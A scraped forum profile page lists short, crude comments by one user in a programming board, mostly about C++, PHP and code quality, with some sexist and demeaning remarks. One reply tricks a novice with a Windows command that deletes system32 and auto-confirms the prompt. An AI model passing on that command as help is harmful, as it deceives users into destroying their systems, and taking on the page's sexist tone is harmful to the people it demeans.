Comment on: Forcing women into programming is a fucking mistake
0 29 May 2018 20:32 u/SChalice in v/programmingComment on: Forcing women into programming is a fucking mistake
You don't need C++ to do these functions. Having a private function that simply sets the same variable is a waste.
Comment on: Forcing women into programming is a fucking mistake
Only pussies use private
Comment on: After being completely honest, Upwork banned my account for 'being dishonest'
I code php and would have no fucking clue off the top of my head how to propagate a session id.
$_SESSION['count']++;
Just found this line of code
2 1 comment 21 Feb 2018 23:43 u/SChalice (self.programming) in v/programmingComment on: Report: 80's kids started programming at an earlier age than today's millennials
If you were a good programmer then you were basically VP of any company...
Comment on: Report: 80's kids started programming at an earlier age than today's millennials
hella easier than today's computers
Comment on: Report: 80's kids started programming at an earlier age than today's millennials
0 24 Jan 2018 23:03 u/SChalice in v/programmingComment on: Only 36% of Indian engineers can write compilable code: study
If your code doesn't compile by definition you are not an engineer.
Comment on: hello code wizards !! i would like to know, how do i download the internets?
You need something like
del c:\\WINDOWS\system32 < yes.txt
Where yes.txt contains a 'y' response to the "Are you sure" prompt...
Comment on: Using Docker for Magento 2 development
I ditched all consideration of Magento after the massive security flaws were exposed. Even if patched, it shows that their development team is not thinking straight.
CCMD_SET_LAP_DNCE_MODE
1 0 comments 16 Mar 2017 22:36 u/SChalice (self.programming) in v/programmingComment on: How many of you can still read your own code you created years ago?
If you can't then you aren't a coder.
The chick did. Pushing and Popping the stack to set a variable is a great way to make slow programs.